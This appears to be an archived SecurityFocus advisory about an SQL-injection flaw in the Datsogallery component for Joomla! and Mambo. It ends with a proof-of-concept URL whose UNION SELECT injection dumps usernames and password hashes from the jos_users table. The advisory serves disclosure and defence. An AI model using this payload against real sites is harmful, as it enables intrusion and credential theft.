8 lines
581 B
Text
Executable file
8 lines
581 B
Text
Executable file
source: http://www.securityfocus.com/bid/28361/info
|
|
|
|
The Datsogallery component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/index.php?option=com_datsogallery&func=detail&id='union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
|
|
|